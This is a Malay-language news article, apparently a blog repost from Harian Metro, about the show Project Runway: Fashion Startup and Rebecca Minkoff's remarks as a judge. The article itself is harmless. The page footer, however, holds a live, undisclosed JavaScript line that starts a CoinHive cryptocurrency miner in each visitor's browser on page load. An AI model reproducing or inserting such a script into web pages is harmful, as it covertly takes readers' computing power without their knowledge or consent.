© Copyright 2017, All Rights Reserved
Home / Hiburan / Bersaing tambat hati panel | Harian Metro

Bersaing tambat hati panel | Harian Metro

Program Project Runway: Fashion Startup yang mula di tayangkan di saluran Lifetime, jam 9 malam semalam memberi inspirasi kepada usahawan baru memperkenalkan produk mereka di pasaran.

Menerusi program lapan episod ini, peserta terdiri daripada usahawan produk kecantikan dan fesyen cuba meyakinkan barisan panel untuk melabur dalam perniagaan mereka.

Empat panel berpengalaman dalam industri fesyen yang bakal menilai produk usahawan terbabit ialah Rebecca Minkoff, Gary Wassner, Katia Beauchamp dan Christine Hunsicker.

Walaupun program ini tidak menawarkan wang untuk pemenang, beberapa peserta berjaya menambat hati panel untuk bekerjasama dengan mereka.

Antaranya pengasas UNItiques, Alexandra Shadrow yang mendapat kepercayaan Minkoff untuk membuka gerai di New York.

Menurut Minkoff, dia tertarik dengan UNItiques kerana menyediakan ruang kepada pelajar universiti untuk menjual dan membeli barang pada harga berpatutan.

“Perniagaan ini mendapat sambutan baik di Amerika Syarikat dan pemiliknya menunjukkan minat terhadap konsep berkenaan.

“Selain UNItiques, saya turut bersetuju untuk bekerjasama dengan I.X Style yang mengupah pereka wanita membuat kasut sandal Huarache selepas mendapati produk yang ditawarkan sangat menarik,” katanya ketika ditemu bual, baru-baru ini.

Bercerita mengenai pembabitannya dalam program ini, pemilik barangan mewah wanita itu berkata, dia mahu mencari usahawan yang mempunyai pelan perniagaan kukuh.

“Saya mahu usahawan yang sanggup menghadapi pelbagai cabaran dan berusaha memajukan perniagaan dengan merangka pelan terbaik,” katanya.

Menurut Minkoff, dia tiada masalah mengendalikan program berkenaan kerana sudah mendapat pendedahan dengan muncul di televisyen sejak beberapa tahun lalu.

“Pengarah pernah memaklumkan saya kelihatan membosankan. Jadi, saya menggunakan pengalaman lalu untuk memperbaiki segala kelemahan dan berjaya mengendalikan Projek Runway dengan baik. Mujur untuk program ini, saya dan panel bebas menentukan apa yang kami suka,” katanya.

Dalam pada itu, Minkoff berkata, industri fesyen di Asia berkembang pesat dan menjadi pasaran pertama membeli produk jenamanya di luar Amerika Syarikat.

“Jenama saya mula diterima di Asia selepas diperkenalkan sebuah majalah Jepun. Sejak itu, kebanyakkan produk saya menjadi pilihan pelanggan di Asia,” katanya.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Sebak hati AG ziarah kubur

PENYAMPAI radio Kool FM, AG turut meluangkan masa menziarah kubur 11 pelajar ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();